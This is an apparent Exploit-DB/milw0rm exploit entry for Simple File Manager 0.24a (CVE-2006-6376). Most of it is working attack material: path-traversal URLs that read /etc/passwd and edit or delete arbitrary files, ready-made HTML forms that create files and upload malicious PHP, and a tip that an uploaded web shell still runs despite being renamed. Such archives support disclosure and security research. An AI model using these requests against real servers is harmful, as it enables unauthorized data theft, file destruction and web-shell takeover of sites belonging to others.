simple file manager 0.24a - Multiple Vulnerabilities

EDB-ID:

2883

CVE:

2006-6376

EDB Verified:

Author:

flame

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2006-12-02

Vulnerable App: 
/*******************************************\
| flame vrs Simple File Manager <=0.24=>    |
| http://onedotoh.sourceforge.net/          |
| Various Vulnerbilities Including:         |
\*******************************************/
/+++++++++++++++++++++++++++++++++++++++++++\
| Using the scripts supplied by the webapp: |
| Reading of Arbitrary files                |
| Deletion of Arbitrary files               |
| Modification of Arbitrary files           |
| Creation of Arbitrary files               |
| Uploading of Malicious files              |
\+++++++++++++++++++++++++++++++++++++++++++/


/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\
| Simple File Manager (SFM) is a web based  |
| file management utility.                  |
| It is designed to be used by those that   |
| don't want to use ftp or SHOULD NOT use   |
| ftp. It can be dropped into a specific    |
| directory and give access to that         |
| directory as well as any directory below  |
| it, including those created by SFM. It    |
| can be placed in a specific directory and |
| configured to give access to other        |
| directories outside of its location       |
| (centralized). SFM gives its user upload, |
| rename, delete, directory creation as     |
| well as directory navigation (within its  |
| tree limits), as well as Create New File; |
| it also includes an image viewer, text    |
| viewer and mime type downloading.         |
\&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/
 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |
 | Thats the description from the author...|
 | Which basically outlines all of its     |
 | vulnerbilities.                         |
 \_________________________________________/

/=========================================================================================================================\
############################ .:Reading of Arbitrary Files:. ###############################################################
# fm.php?action=download&filename=[RELATIVE PATH / FILENAME]&pathext=&u=&&copt=1&sortKey=2                                #
# EG: http://www.site.com/file/fm.php?action=download&filename=../../../../../../etc/passwd&pathext=&u=&&copt=1&sortKey=2 #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################ .:Deletion of Arbirary Files:. ###############################################################
# fm.php?delete=[RELATIVE PATH / FILENAME]&copt=1&sortKey=2&u=&pathext=                                                   #
# EG: http://www.site.com/file/fm.php?delete=phpshell.php&copt=1&sortKey=2&u=&pathext=                                    #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################# .:Modification of Arbitrary Files:. #########################################################
# fm.php?edit=[RELATEIVE PATH / FILENAME]&u=&copt=1&pathext=                                                              #
# EG: http://www.site.com/file/fm.php?edit=../index.php&u=&copt=1&pathext=                                                #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################# .:Creation of Arbitrary Files:. #############################################################
# START LOCAL HTML FILE:                                                                                                  #
 <form name="form1" method="post" action="http://www.site.com/file/fm.php">
 <center>Filename: <input type="text" name="newfilename">
 <select class=altButton name="newfileext">
 <option>.txt</option><option>.html</option><option>.php</option>
 </select>
 <textarea name="newcontent" cols="60" rows="15">&lt;/textarea&gt;
 <input type="hidden" name="copt" value="1">
 <input type="submit" name="savenew" value="Save">
 <input type="hidden" name="u" value="">
 <input type="hidden" name="pathext" value="/">
 <input type="hidden" name=sortKey value="2">
 </center>
 </form>
# END LOCAL HTML FILE                                                                                                     #
###########################################################################################################################
# Note... various characters are escaped. And by default all .php files will be renamed to file.php.off                   #
# Note... The author decided to let you change the fm.php file anyway (*See Modification of Arbitrary files)              #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################## .: Uploading of Malicious Files:. ##########################################################
# START LOCAL HTML FILE:                                                                                                  #
<form name="form1" method="post" action="http://www.site.com/file/fm.php" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="104857600">
<input type="hidden" name="copt" value="1">
<input type="file" name="uploadedfile">
<input type="submit" name="upload" value="Upload">
<input type="hidden" name="u" value="">
<input type="hidden" name="pathext" value="/">
<input type="hidden" name=sortKey value="2">
</form>
# END LOCAL HTML FILE                                                                                                     #
###########################################################################################################################
# Note... By default all .php files will be renamed to file.php.off, you can usually just browse to the file anyway and it#
# will execute... EG: http://www.site.com/file/phpshell.php.off                                                           #
###########################################################################################################################
\=========================================================================================================================/

                                       /++++++++++++++++++++++++++++\
                                       | Be good, and dont be too   |
                                       | hopeful about finding      |
                                       | yourself a gibbon running  |
                                       | this script. It predates   |
                                       | my #999999 hair.           |
                                       \++++++++++++++++++++++++++++/

      /{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}\
      |---------------------------------------|
      | <&bk> stfu flame                      |
      | <~PhaZe_One> no fame without flame    |
      | <+c|p> I love you flame               |
      | <%emc2> flame wishes death upon you   |
      | <Thaimaishu> are you emo flame?       |
      | <&[myg0t]40> flame dont be mad        |
      | *~str0ke humps flame's leg            |
      | <&ZoNe_VoRTeX> <3 flame               |
      |---------------------------------------|
      \{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}/

# milw0rm.com [2006-12-02]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services